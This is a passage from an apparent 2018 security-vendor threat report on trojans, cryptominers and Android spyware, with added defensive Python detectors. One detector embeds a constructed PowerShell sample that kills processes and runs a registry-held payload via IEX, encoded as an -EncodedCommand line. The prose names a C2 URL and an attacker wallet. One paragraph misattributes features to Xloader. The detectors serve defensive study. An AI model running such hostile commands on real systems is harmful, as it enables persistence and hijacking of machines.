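    """Run the three rules over a list of event dicts; return (rule, event id) pairs."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            parent = basename(ev["parent_image"])
            child = basename(ev["image"])
            # Rule 1 (Emotet, Flawed Ammyy): an Office process starting a script host.
            if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
                findings.append(("office_spawns_script_host", ev["id"]))
            # Rule 2 (Injector): a hex-named binary executed from under %APPDATA%.
            if "\\appdata\\" in ev["image"].lower() and HEX_NAME.match(child):
                findings.append(("hex_named_binary_from_appdata", ev["id"]))
        elif ev["type"] == "service_install":
            image = ev["image_path"].lower()
            # Rule 3 (Emotet): a new service whose binary sits in a system
            # directory but lacks the Microsoft signature a genuine Windows
            # service binary carries (the signer field is an assumption).
            if image.startswith(SYSTEM_DIRS) and ev.get("signer") != "Microsoft Windows":
                findings.append(("unsigned_service_in_system_dir", ev["id"]))
    return findings


# Constructed telemetry: a benign Office launch, the Emotet chain, a benign
# Microsoft service, and Injector's self-copy launch. Not real log data.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"},
    {"id": 2, "type": "process_create",
     "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"id": 3, "type": "service_install", "name": "lanesviewer",
     "image_path": "C:\\Windows\\SysWOW64\\lanesviewer.exe", "signer": None},
    {"id": 4, "type": "service_install", "name": "wuauserv",
     "image_path": "C:\\Windows\\System32\\svchost.exe", "signer": "Microsoft Windows"},
    {"id": 5, "type": "process_create",
     "parent_image": "C:\\Users\\alice\\Downloads\\Scanned_Document.exe",
     "image": "C:\\Users\\alice\\AppData\\Roaming\\D5E2DEE36C7A.exe"},
]


def run_sample():
    """Apply the rules to the constructed events."""
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, event_id in run_sample():
        print(f"event {event_id}: {rule}")
```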
And after that Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning because it infects computers with popular legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on a legitimate software product called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.
Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see on the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest version of the malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that this trick is also based on using legitimate software, Microsoft's this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The malicious IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
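Because an IQY attachment is only a URL plus a few options, a mail gateway can parse it and decide on the URL alone, before Excel ever fetches anything. The parser and triage check below are an added example, not Comodo's or Microsoft's code; the two attachments are constructed (one pointing at a TEST-NET address), and the host allow-list is an assumed corporate policy value.

```python
from urllib.parse import urlsplit

# Assumed corporate policy: the only hosts Excel web queries may reach.
ALLOWED_HOSTS = {"intranet.example.com"}


def parse_iqy(text: str) -> dict:
    """Parse the minimal IQY layout: 'WEB', a version line, the URL, then key=value options."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    query = {"version": lines[1], "url": lines[2], "options": {}}
    for ln in lines[3:]:
        key, sep, value = ln.partition("=")
        if sep:
            query["options"][key.strip()] = value.strip()
    return query


def triage_iqy(text: str) -> list:
    """Return the reasons an IQY should be held at the gateway; an empty list means it passes."""
    query = parse_iqy(text)
    url = urlsplit(query["url"])
    host = (url.hostname or "").lower()
    reasons = []
    # Excel fetches whatever this URL returns, so scheme and host are the whole trust decision.
    if url.scheme.lower() != "https":
        reasons.append(f"non-https scheme: {url.scheme or 'none'}")
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host not on allow-list: {host or 'none'}")
    return reasons


# Constructed attachments: a legitimate intranet query and a lure that points at a
# TEST-NET address over plain HTTP. Neither is the IQY from the campaign above.
BENIGN_IQY = (
    "WEB\n1\nhttps://intranet.example.com/reports/sales.aspx\n\n"
    "Selection=AllTables\nFormatting=None\nPreFormattedTextToColumns=True\n"
)
SUSPECT_IQY = "WEB\n1\nhttp://203.0.113.10/q/1\n\nSelection=AllTables\n"


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_IQY), ("suspect", SUSPECT_IQY)):
        print(name, triage_iqy(body) or "ok")
```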
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulation of users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
[Chart: The growth of Flawed Ammyy attacks for Q2. Monthly detections: Apr 43188, May 46382, Jun 48881]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers did not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself into the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
The malicious code in the registry
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all the computers involved, but of course the company's financial losses were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes of a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes carry the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only the victim's system but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner takes sole possession of the victim's computer and uses its resources to mine cryptocurrency.
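The two behaviours described in 3.1 and 3.3, an encoded PowerShell command that pulls its payload from the registry (BadShell) and a script that kills a list of competing miner processes (CoinMiner), are both visible in the command line before anything runs, which is where a defender can triage them. The following script is an added example, not Comodo's code and not taken from either sample: it decodes a -EncodedCommand argument (PowerShell expects base64 over the UTF-16LE text of the script) and reports those two patterns. The sample command line, the process names ExampleMinerA and ExampleMinerB and the registry key HKCU:\Software\ExampleKey are constructed for the demonstration; only the list names $malwares and $malwares2 and the process name AMDDriver64 come from the report.

```python
"""Static triage of a suspicious PowerShell command line (added example).

Decodes -EncodedCommand and flags two patterns described in the report:
a registry-hosted payload handed to Invoke-Expression (BadShell) and
arrays of process names fed to a kill command (CoinMiner's kill list).
The sample data below is constructed; it is not a real malware sample.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts -EncodedCommand, -enc, -ec and -e; the argument is
# base64 over the UTF-16LE encoding of the script text.
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
REGISTRY_READ = re.compile(r"Get-ItemProperty|\[Microsoft\.Win32\.Registry\]|HK(?:LM|CU):", re.IGNORECASE)
EVALUATE = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)
KILL = re.compile(r"Stop-Process|taskkill|\.Kill\(\)", re.IGNORECASE)
# $name = @('a', 'b', ...)  is the array syntax a kill list uses
ARRAY_ASSIGN = re.compile(r"\$(\w+)\s*=\s*@\(([^)]*)\)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script text behind an encoded-command argument, or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_process_lists(script: str) -> Dict[str, List[str]]:
    """Collect every $var = @(...) array of quoted names in the script."""
    lists = {}
    for name, body in ARRAY_ASSIGN.findall(script):
        items = [item.strip().strip("'\"") for item in body.split(",") if item.strip()]
        lists[name] = items
    return lists


def triage(cmdline: str) -> dict:
    """Decode the command line if it is encoded and return the findings."""
    script = decode_encoded_command(cmdline) or cmdline
    findings = []
    if REGISTRY_READ.search(script) and EVALUATE.search(script):
        findings.append("payload read from the registry and passed to Invoke-Expression")
    lists = extract_process_lists(script)
    if lists and KILL.search(script):
        summary = ", ".join(f"${name} ({len(names)} names)" for name, names in lists.items())
        findings.append(f"process kill list: {summary}")
    return {"script": script, "lists": lists, "findings": findings}


# Constructed sample: mirrors the two behaviours named in the report, nothing more.
SAMPLE_SCRIPT = (
    "$malwares = @('ExampleMinerA', 'ExampleMinerB'); "
    "$malwares2 = @('AMDDriver64'); "
    "foreach ($p in $malwares + $malwares2) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }; "
    "$code = (Get-ItemProperty -Path 'HKCU:\\Software\\ExampleKey').Payload; "
    "IEX $code"
)


def sample_cmdline() -> str:
    """The constructed script as it would appear in a scheduled task's action."""
    encoded = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -EncodedCommand {encoded}"


if __name__ == "__main__":
    result = triage(sample_cmdline())
    for finding in result["findings"]:
        print("FINDING:", finding)
    for name, names in result["lists"].items():
        print(f"${name}: {names}")
```

The same two checks apply to the action field of a scheduled task or a Run key, which is where BadShell-style persistence stores the command line; the decoded script is returned so that it can be archived with the alert.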
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made it easier for users to detect them. In Q2 these cryptominers learned to hide; CoinHive is the brightest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage CoinHive's presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1, to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code, but does not find any sign of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
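The hiding trick above (an encoded string that decodes to a 1x1 iframe pointing at a cnhv.co short link) can be found in page source without executing the page, provided the check decodes what the script would decode. The scanner below is an added example; it is not part of the report and not CoinHive's or Comodo's code. It assumes the obfuscated string is base64 handed to atob(), which is one common form of the trick rather than the exact encoding in the screenshot, and it treats the two CoinHive domains named on this page (coinhive.com and cnhv.co) as known miner hosts. The sample page and the short-link path are constructed.

```python
"""Scan a web page for hidden CoinHive loaders (added example, not from the report).

Looks for iframes, including ones that only appear after decoding base64
strings embedded in the page, and flags those that are 1x1 (or smaller)
or that point at a known miner host. The sample page below is constructed.
"""
import base64
import re
from typing import Dict, List
from urllib.parse import urlparse

# Both hosts are named in the report; the short-link path used below is made up.
KNOWN_MINER_HOSTS = {"coinhive.com", "cnhv.co"}

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTRIBUTE = re.compile(r"([a-zA-Z-]+)\s*=\s*[\"']?([^\"'\s>]+)")


def decoded_layers(html: str, max_depth: int = 3) -> List[str]:
    """Return the page plus any printable text hidden in base64 runs, recursively."""
    layers, frontier = [html], [html]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for run in BASE64_RUN.findall(text):
                try:
                    decoded = base64.b64decode(run, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not base64, or not text once decoded
                if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
                    next_frontier.append(decoded)
        layers.extend(next_frontier)
        frontier = next_frontier
    return layers


def _pixels(value) -> int:
    """Parse a width/height attribute; a missing size counts as visible."""
    if value is None:
        return 10**6
    digits = re.sub(r"[^0-9]", "", value)
    return int(digits) if digits else 10**6


def suspicious_iframes(html: str) -> List[Dict]:
    """Flag iframes that are effectively invisible or that load a known miner host."""
    hits = []
    for layer in decoded_layers(html):
        for tag in IFRAME_TAG.finditer(layer):
            attrs = {k.lower(): v for k, v in ATTRIBUTE.findall(tag.group(1))}
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            tiny = _pixels(attrs.get("width")) <= 1 and _pixels(attrs.get("height")) <= 1
            known = host in KNOWN_MINER_HOSTS
            if tiny or known:
                hits.append({"src": src, "host": host, "tiny": tiny, "known_miner_host": known})
    return hits


# Constructed sample page: one ordinary widget iframe plus a base64-wrapped
# 1x1 iframe pointing at a cnhv.co short link, written out by atob().
HIDDEN_IFRAME = ('<iframe src="https://cnhv.co/EXAMPLE-SHORTLINK" '
                 'width="1" height="1" frameborder="0"></iframe>')
SAMPLE_PAGE = (
    "<html><body><h1>Welcome</h1>"
    '<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>'
    "<script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode("utf-8")).decode("ascii")
    + "'))</script></body></html>"
)

if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_PAGE):
        print(hit)
```

The size check matters as much as the host list: the short-link domain can be changed at will, but an iframe that is deliberately 1x1 or 0x0 has no legitimate reason to exist on most pages and is what the report's screenshot shows.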
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
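The swap shown above is detectable on the endpoint because the attacker changes the clipboard without the user copying anything. The guard below is an added example, not part of the report and not the hijacker's code: it simulates a clipboard monitor that remembers what the user last copied and raises an alert when the clipboard suddenly holds a different wallet address of the same currency. The two Bitcoin addresses used in the demonstration are the ones quoted in the report; the address patterns are the common Bitcoin (1..., 3..., bc1...) and Ethereum (0x...) formats, and a real deployment would read the clipboard through the operating system rather than through the observe() calls used here.

```python
"""Clipboard-swap detector for cryptocurrency addresses (added example, not from the report).

A hijacker replaces a copied wallet address with its own. A guard that
remembers what the user actually copied can spot the substitution before
the transfer is sent.
"""
import re
from typing import Dict, Optional

# Syntactic address patterns: (currency, format name, regex).
# Base58 omits 0, O, I and l; bech32 omits 1, b, i and o.
ADDRESS_FORMATS = [
    ("bitcoin", "p2pkh", re.compile(r"^1[1-9A-HJ-NP-Za-km-z]{25,34}$")),
    ("bitcoin", "p2sh", re.compile(r"^3[1-9A-HJ-NP-Za-km-z]{25,34}$")),
    ("bitcoin", "bech32", re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$")),
    ("ethereum", "hex", re.compile(r"^0x[0-9a-fA-F]{40}$")),
]


def classify(text: str) -> Optional[Dict[str, str]]:
    """Return {'currency', 'format'} if text looks like a wallet address, else None."""
    text = text.strip()
    for currency, fmt, pattern in ADDRESS_FORMATS:
        if pattern.match(text):
            return {"currency": currency, "format": fmt}
    return None


class ClipboardGuard:
    """Compares what the user copied with what the clipboard later contains."""

    def __init__(self) -> None:
        self.last_user_copy: Optional[str] = None

    def user_copied(self, text: str) -> None:
        """Hook for the user's own copy action (Ctrl+C), the trusted source."""
        self.last_user_copy = text.strip()

    def observe(self, clipboard: str) -> Optional[Dict]:
        """Poll hook: return an alert if the clipboard holds an unexpected address."""
        clipboard = clipboard.strip()
        now = classify(clipboard)
        if now is None or clipboard == self.last_user_copy:
            return None  # not an address, or exactly what the user copied
        copied = classify(self.last_user_copy) if self.last_user_copy else None
        if copied is None:
            reason = "wallet address appeared in the clipboard without a user copy"
        elif copied["currency"] == now["currency"]:
            reason = f"{now['currency']} address replaced by a different {now['currency']} address"
        else:
            reason = "copied address replaced by an address of another currency"
        return {
            "reason": reason,
            "copied": self.last_user_copy,
            "clipboard": clipboard,
            "currency": now["currency"],
            "format": now["format"],
        }


if __name__ == "__main__":
    # The two addresses quoted in the report's clipboard hijacker example.
    guard = ClipboardGuard()
    guard.user_copied("3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs")
    print(guard.observe("3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"))  # None: unchanged
    print(guard.observe("1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"))  # alert: swapped
```

The comparison is deliberately syntactic: the guard does not need to know whether an address is valid, only that the clipboard changed from one address to another without the user's involvement, which is exactly the hijacker's footprint.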
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contact IDs, names, phone numbers and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of disseminating the malware was social networks.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the applications installed
- Collect browser data
- Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
- Extracts photos, audio and video
- Records the screen
- Executes shell commands
- Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message DB and related keys
- Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Set Wi-Fi to always on
Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:
- Send_SMS - extract SMS content and send it to the C&C server
- Send_USSD - send the USSD to the C&C server
- Gethistory - monitor browser history
- Start_AllApp - gather info about installed applications
- Send_call - set the Intent action to call
- Forward_call - forward incoming calls
- ResForward_call - reset call forwarding
- Go_Smsmnd - delete SMS content
- Go_GetAlls - get SMS history
- Dell_sms - delete SMS content in a conversation
- Send_spam - send spam SMS
- Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to the C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp
Here are some commands from its Command and Control server:
- contacts - Get contact details and email id
- Mute - Set action to mute
- Mms - Get MMS content
- info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers to spread.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
